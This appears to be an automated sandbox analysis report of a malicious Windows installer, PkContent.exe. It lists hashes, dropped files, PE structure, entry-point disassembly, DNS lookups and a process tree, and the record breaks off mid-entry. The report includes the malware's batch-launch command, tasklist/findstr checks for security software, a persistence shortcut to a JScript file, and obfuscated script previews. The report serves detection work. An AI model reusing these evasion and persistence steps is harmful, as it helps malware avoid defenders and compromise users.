SHA-256: D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512: A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: EO3RT0fEfb.exe, Detection: malicious
• Filename: RMBOriPHVJ.exe, Detection: malicious
• Filename: S6x3K8vzCA.exe, Detection: malicious
• Filename: PPbimZI4LV.exe, Detection: malicious
• Filename: l5VhEpwzJy.exe, Detection: malicious
• Filename: duyba.lnk.download.lnk, Detection: malicious
• Filename: pt8GJiNZDT.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
File Type: data
Category: dropped
Size (bytes): 260336
Entropy (8bit): 7.999311838752394
Encrypted: true
SSDEEP: 6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
MD5: A65498AB3A69A64EAD790DB5BB2F48AA
SHA1: EB8CD723DAB355FF507B356B9286F09B9FFCD968
SHA-256: 9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
SHA-512: 9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
Malicious: false
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 893608
Entropy (8bit): 6.62028134425878
Encrypted: false
SSDEEP: 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5: 18CE19B57F43CE0A5AF149C96AECC685
SHA1: 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256: D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512: A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: EO3RT0fEfb.exe, Detection: malicious
• Filename: RMBOriPHVJ.exe, Detection: malicious
• Filename: S6x3K8vzCA.exe, Detection: malicious
• Filename: PPbimZI4LV.exe, Detection: malicious
• Filename: l5VhEpwzJy.exe, Detection: malicious
• Filename: duyba.lnk.download.lnk, Detection: malicious
• Filename: pt8GJiNZDT.exe, Detection: malicious
Process: C:\Windows\SysWOW64\cmd.exe
File Type: data
Category: dropped
Size (bytes): 260336
Entropy (8bit): 7.999311838752394
Encrypted: true
SSDEEP: 6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
MD5: A65498AB3A69A64EAD790DB5BB2F48AA
SHA1: EB8CD723DAB355FF507B356B9286F09B9FFCD968
SHA-256: 9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
SHA-512: 9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
Malicious: false
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):92160
                                              Entropy (8bit):7.997684559122398
                                              Encrypted:true
                                              SSDEEP:1536:IwEPVIU3le9KUpCuF/Rw7B1Ph87++NdnOpL1+2TZMzDfbCjkqmqISfnKu4+Q1P:IwE9/e91xO7fh8akkL1WPCjRmq5vv4+Q
                                              MD5:975BFC19287C2C5B74A1B228F30F14B0
                                              SHA1:8F5FEEC00B337529A7E193F452C45F6063AD37A1
                                              SHA-256:91E28EFACE5E10865887B9A13420B1BFD3A8673255785E3BFC65745DA63D1322
                                              SHA-512:18D8C41EBCBA5667CB3AC3FA1270D78CAD2FD9E8FC69DD32969B693FEDC6354E3DE12F74830E68B55C6AA7C5A0FBB388599F827CB94D71732231F4EBBF580F85
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59392
                                              Entropy (8bit):7.99698463424558
                                              Encrypted:true
                                              SSDEEP:1536:c4/at9N5gQq5rFSWa39Mp9cBESBESKI2Eux:c4K9NOQq5rpa3ipmBESmSL2Eux
                                              MD5:01D7374BF51507454392D1081D9B309E
                                              SHA1:034378159B5F4B6089A95064AEC9FF210DA7C3DF
                                              SHA-256:EECDD8DFD2DD6D9D1C55077EE6515A9C59D3046112D014B7A5E87FDABB8157A2
                                              SHA-512:DE64B35BFD2C279A77D552F7C518421BFFCF2F5D14E78FA3F80E21B97AEB5DC287340452D61CA19C9AA5CE426C61EC6605786727D844282AA5457A1D8C4F94F4
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:ASCII text, with very long lines (811), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):17659
                                              Entropy (8bit):4.996564903453331
                                              Encrypted:false
                                              SSDEEP:384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
                                              MD5:F15A876FE95AF76D09E4F26593B4502E
                                              SHA1:53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
                                              SHA-256:4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
                                              SHA-512:CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
                                              Malicious:false
                                              Preview:Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:ASCII text, with very long lines (811), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):17659
                                              Entropy (8bit):4.996564903453331
                                              Encrypted:false
                                              SSDEEP:384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
                                              MD5:F15A876FE95AF76D09E4F26593B4502E
                                              SHA1:53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
                                              SHA-256:4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
                                              SHA-512:CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
                                              Malicious:false
                                              Preview:Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):886191
                                              Entropy (8bit):6.62214375347849
                                              Encrypted:false
                                              SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                              MD5:260377B64080B872FFD57234FF7D097E
                                              SHA1:F9EA953F328A1EC1CAC31AC05A6353AE27519238
                                              SHA-256:29826DE3343C0A6F753F3CDCC551E755E12059E79B0658BE1048E5F893E1C0D3
                                              SHA-512:A01A781D352AC7CB98FD17F91DB6114147188519819106D27A183F8BC114713DE8D0E78524DCAB8833187E365F2207DA5E4CD77FC8D787F63B48A04BF17B6DE5
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):10480
                                              Entropy (8bit):7.983798029647035
                                              Encrypted:false
                                              SSDEEP:192:jynff145sxYlJ7FDcxxHHivPT+sefSn+zStbLkJdljKQQkVww:j+Hk7Fiel+zqyl+xkh
                                              MD5:B5A2CE2534752D3A6033F59C8436D7B6
                                              SHA1:8E184055AF6E0F7DCD83D832BD565E784A7B8E80
                                              SHA-256:C142EBC3005012C982B366C6E4B03DB5B477C721EED245592A6F2C585EC314C3
                                              SHA-512:C2F5480E23FCD32AC7111FC9E507B7660EE551477A1DC18F188BD5796BF29BC93CC10926908F9F6483E906BFC07DDE07BE7223BC0B4B4C5DBC0FA1C0F2D43F2C
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):7439
                                              Entropy (8bit):6.20867102662523
                                              Encrypted:false
                                              SSDEEP:192:3HAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3j:3HAHhww+/2nlP3r1WAL3j
                                              MD5:4192BA712A2FDC09914B07D144F06E20
                                              SHA1:0A3320EEA12B490FD589B9F2CB878579108BE555
                                              SHA-256:265661FDDDD79AEFCFBA0FC456CF864C05439B8281DA8345D200283F5664A229
                                              SHA-512:543248B976F061C835329ADBCCBB249922EBEB671BB158D7A0E70284E0FE9D723C18E8A2E4F198202CFA20DC3D0F341EFD4E78C64F4D5E56E8D2A08745417948
                                              Malicious:false
                                              Preview:WowLiberalCalOfficer..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):98304
                                              Entropy (8bit):7.997882479856261
                                              Encrypted:true
                                              SSDEEP:1536:jCFS3z3sTLVmA/uMsH3zK6wrNp9FCLFM1pKOnaJt7ggzNVsFBLiHy4QWQ3NSmFPN:p3z3sTLEA/Kj9S/9p1ajcQVs3iH9Q3Nn
                                              MD5:B7C64D91870C30F6D27B86C9294CA361
                                              SHA1:41EA994169F7BEA9752F6BD40D9833D6577EDE49
                                              SHA-256:91A57858547382FA34E5AAD2A6C8546C4EAEAA32B515693E42E84AD190149A6A
                                              SHA-512:D6D3625A28A8AB2AAD5E5E80CB10798D3602E0E189D521E4FECBEE4F4015F07E7D2C6F9CDBEC4C9EFCC5C903C3EBAAF9B6ABBF30D615748316992A5C398BC1B6
                                              Malicious:false
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):93
                                              Entropy (8bit):4.924866914662243
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5iQRAcCIPcp:HRYF5yjo923iQRAcPS
                                              MD5:01E010484AAD4239F5FD79A5AEE232DD
                                              SHA1:6776ED4C99E9E3340752BFEEBAE89AF580163159
                                              SHA-256:EF91C467627F435A6A51A1949BC84EE8C4D263F5BA01677E56AE2B7F29889436
                                              SHA-512:36475BDB8AA994289D6A4D497547E6F250AB8F87D2C8E424CA0E66FAD6F85118023D874A11387BA00C5011EC65DED48EB52185D2C869D3B7DF8A346388F98B79
                                              Malicious:true
                                              Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" ..
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.3246704923656605
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:PkContent.exe
                                              File size:830'415 bytes
                                              MD5:87c051a77edc0cc77a4d791ef72367d1
                                              SHA1:5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
                                              SHA256:b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
                                              SHA512:259a3f823d5051fcc9e87ceacf25557ab17f5d26ff4f0c17801d9ef83a23d2a51261a73e5ba9c3caf1ca2feb18a569458f17a2a5d56b542b86d6a124a42d4c2c
                                              SSDEEP:12288:FCxMe2dk7YgL+OsQdFGHjaRYf9bquEZ68ufU3wqB2ydPsW/w0bvf:FsMe2KYIDpSO5vZ68FwqB2aPsW3
                                              TLSH:A80523030FEDC667D1E10EB2183381698AB2F89F05B1E66B43A08F1F3175E459A5A35F
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                              Icon Hash:0103010303030303
                                              Entrypoint:0x403883
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push ebp
                                              push esi
                                              push edi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+18h], ebp
                                              mov dword ptr [esp+10h], 00409268h
                                              mov dword ptr [esp+14h], ebp
                                              call dword ptr [00408030h]
                                              push 00008001h
                                              call dword ptr [004080B4h]
                                              push ebp
                                              call dword ptr [004082C0h]
                                              push 00000008h
                                              mov dword ptr [00472EB8h], eax
                                              call 00007F8868E7CB9Bh
                                              push ebp
                                              push 000002B4h
                                              mov dword ptr [00472DD0h], eax
                                              lea eax, dword ptr [esp+38h]
                                              push eax
                                              push ebp
                                              push 00409264h
                                              call dword ptr [00408184h]
                                              push 0040924Ch
                                              push 0046ADC0h
                                              call 00007F8868E7C87Dh
                                              call dword ptr [004080B0h]
                                              push eax
                                              mov edi, 004C30A0h
                                              push edi
                                              call 00007F8868E7C86Bh
                                              push ebp
                                              call dword ptr [00408134h]
                                              cmp word ptr [004C30A0h], 0022h
                                              mov dword ptr [00472DD8h], eax
                                              mov eax, edi
                                              jne 00007F8868E7A16Ah
                                              push 00000022h
                                              pop esi
                                              mov eax, 004C30A2h
                                              push esi
                                              push eax
                                              call 00007F8868E7C541h
                                              push eax
                                              call dword ptr [00408260h]
                                              mov esi, eax
                                              mov dword ptr [esp+1Ch], esi
                                              jmp 00007F8868E7A1F3h
                                              push 00000020h
                                              pop ebx
                                              cmp ax, bx
                                              jne 00007F8868E7A16Ah
                                              add esi, 02h
                                              cmp word ptr [esi], bx
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ C ] VS2010 SP1 build 40219
                                              • [RES] VS2010 SP1 build 40219
                                              • [LNK] VS2010 SP1 build 40219
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x1e898 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc | 0xf4000 | 0x1e898 | 0x1ea00 | 34eb4b5442afecdb4d25529894ddb814 | False | 0.03270886479591837 | data | 0.3626277943818537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x113000 | 0xf32 | 0x1000 | 80b2788b8bb2dc8c3af02ada6000736d | False | 0.045654296875 | data | 0.3620189715935393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_ICON | 0xf4220 | 0x11028 | Device independent bitmap graphic, 128 x 256 x 32, image size 69632 | English | United States | 0.02018027328051441
                                              RT_ICON | 0x105248 | 0x9928 | Device independent bitmap graphic, 96 x 192 x 32, image size 39168 | English | United States | 0.02583656396653744
                                              RT_ICON | 0x10eb70 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.05014239218877136
                                              RT_ICON | 0x1111d8 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.07126593806921676
                                              RT_DIALOG | 0x112300 | 0x100 | data | English | United States | 0.5234375
                                              RT_DIALOG | 0x112400 | 0x11c | data | English | United States | 0.6056338028169014
                                              RT_DIALOG | 0x112520 | 0x60 | data | English | United States | 0.7291666666666666
                                              RT_GROUP_ICON | 0x112580 | 0x3e | data | English | United States | 0.8225806451612904
                                              RT_MANIFEST | 0x1125c0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
                                              DLL | Import
                                              KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                              USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                              GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                              ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                              COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                              Language of compilation system | Country where language is spoken | Map
                                              English | United States |
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 18, 2024 15:30:43.530864000 CET | 58568 | 53 | 192.168.2.5 | 1.1.1.1
                                              Dec 18, 2024 15:30:43.668308020 CET | 53 | 58568 | 1.1.1.1 | 192.168.2.5
                                              Dec 18, 2024 15:30:58.974833965 CET | 65403 | 53 | 192.168.2.5 | 1.1.1.1
                                              Dec 18, 2024 15:30:59.112845898 CET | 53 | 65403 | 1.1.1.1 | 192.168.2.5
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Dec 18, 2024 15:30:43.530864000 CET | 192.168.2.5 | 1.1.1.1 | 0x2ca2 | Standard query (0) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | A (IP address) | IN (0x0001) | false
                                              Dec 18, 2024 15:30:58.974833965 CET | 192.168.2.5 | 1.1.1.1 | 0x59f1 | Standard query (0) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Dec 18, 2024 15:30:43.668308020 CET | 1.1.1.1 | 192.168.2.5 | 0x2ca2 | Name error (3) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | none | none | A (IP address) | IN (0x0001) | false
                                              Dec 18, 2024 15:30:59.112845898 CET | 1.1.1.1 | 192.168.2.5 | 0x59f1 | Name error (3) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | none | none | A (IP address) | IN (0x0001) | false


                                              Target ID:0
                                              Start time:09:30:38
                                              Start date:18/12/2024
                                              Path:C:\Users\user\Desktop\PkContent.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PkContent.exe"
                                              Imagebase:0x400000
                                              File size:830'415 bytes
                                              MD5 hash:87C051A77EDC0CC77A4D791EF72367D1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:09:30:39
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:09:30:39
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:09:30:40
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                              Wow64 process (32bit):true
                                              Commandline:tasklist
                                              Imagebase:0xa30000
                                              File size:79'360 bytes
                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:09:30:40
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /I "wrsa opssvc"
                                              Imagebase:0x680000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                              Wow64 process (32bit):true
                                              Commandline:tasklist
                                              Imagebase:0xa30000
                                              File size:79'360 bytes
                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:09:30:41
